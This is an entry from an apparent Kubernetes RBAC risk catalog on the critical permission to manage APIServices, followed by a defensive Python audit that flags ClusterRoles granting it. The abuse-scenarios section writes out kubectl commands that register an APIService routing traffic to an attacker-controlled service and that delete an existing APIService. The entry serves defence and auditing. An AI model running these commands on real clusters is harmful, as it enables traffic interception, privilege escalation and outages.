Manage APIServices
Overview
| Field | Value |
|---|---|
| ID | 1046 |
| Name | Manage APIServices |
| Risk Category | Tampering |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | apiregistration.k8s.io |
| Resources | apiservices |
| Risky Verb Combinations | [create] · [update] · [patch] · [delete] |
| Tags | APIServiceManipulation · DenialOfService · InformationDisclosure · PrivilegeEscalation · Tampering |
Description
Grants control over APIServices, the objects that register aggregated API servers with the kube-apiserver. This is highly critical: an attacker who can create or modify an APIService can redirect requests for an API group to a server they control, intercept traffic, escalate privileges, cause denial of service, or exfiltrate information.
Abuse Scenarios
- Create a new APIService to redirect API calls to a malicious server.
```bash
kubectl create -f - <<EOF
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  name: v1alpha1.attacker.com
spec:
  service:
    name: <malicious-service-name>
    namespace: <malicious-service-namespace>
  group: attacker.com
  version: v1alpha1
  caBundle: <base64-encoded-ca-cert> # CA for the malicious service
  groupPriorityMinimum: 2000 # Higher than core APIs
  versionPriority: 200
EOF
# Example: kubectl create -f - <<EOF ... EOF
```
- Delete an existing APIService, disrupting aggregated API functionality.
```bash
kubectl delete apiservice <apiservice-name>
# Example: kubectl delete apiservice v1beta1.metrics.k8s.io
```
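As an added defender-side check (not part of this catalog entry), the following Python audit flags every ClusterRole whose rules grant any of the risky verbs above on `apiservices` in `apiregistration.k8s.io`. It goes slightly beyond the table by treating the `*` wildcard in apiGroups, resources or verbs as a match, since a wildcard grants the same capability; the input sample is constructed in the shape of `kubectl get clusterroles -o json`.

```python
RISKY_VERBS = {"create", "update", "patch", "delete"}
TARGET_GROUP = "apiregistration.k8s.io"
TARGET_RESOURCE = "apiservices"


def risky_verbs_in_rule(rule: dict) -> set:
    """Risky verbs a single PolicyRule grants on apiservices ('*' counts as a match)."""
    groups = rule.get("apiGroups") or []
    resources = rule.get("resources") or []
    verbs = set(rule.get("verbs") or [])
    if TARGET_GROUP not in groups and "*" not in groups:
        return set()
    # A subresource such as 'apiservices/status' is not the risky grant; only the bare
    # resource name or a wildcard is.
    if TARGET_RESOURCE not in resources and "*" not in resources:
        return set()
    return set(RISKY_VERBS) if "*" in verbs else verbs & RISKY_VERBS


def find_apiservice_managers(clusterrole_list: dict) -> dict:
    """Map each matching ClusterRole name to the sorted risky verbs it grants.

    clusterrole_list is the parsed output of `kubectl get clusterroles -o json`.
    """
    findings = {}
    for role in clusterrole_list.get("items", []):
        granted = set()
        for rule in role.get("rules") or []:
            granted |= risky_verbs_in_rule(rule)
        if granted:
            findings[role["metadata"]["name"]] = sorted(granted)
    return findings


# Constructed sample: three ClusterRoles as `kubectl get clusterroles -o json` would list them.
SAMPLE_CLUSTERROLES = {"kind": "List", "items": [
    {"metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "apiservice-editor"},
     "rules": [{"apiGroups": ["apiregistration.k8s.io"], "resources": ["apiservices"],
                "verbs": ["get", "list", "patch", "update"]}]},
    {"metadata": {"name": "apiservice-viewer"},
     "rules": [{"apiGroups": ["apiregistration.k8s.io"], "resources": ["apiservices"],
                "verbs": ["get", "list", "watch"]}]},
]}

if __name__ == "__main__":
    for name, verbs in find_apiservice_managers(SAMPLE_CLUSTERROLES).items():
        print(f"{name}: {', '.join(verbs)}")  # flags cluster-admin and apiservice-editor only
```

Run against a live cluster by loading the JSON from `kubectl get clusterroles -o json` and passing the parsed object to `find_apiservice_managers`; the read-only `apiservice-viewer` role is correctly left out.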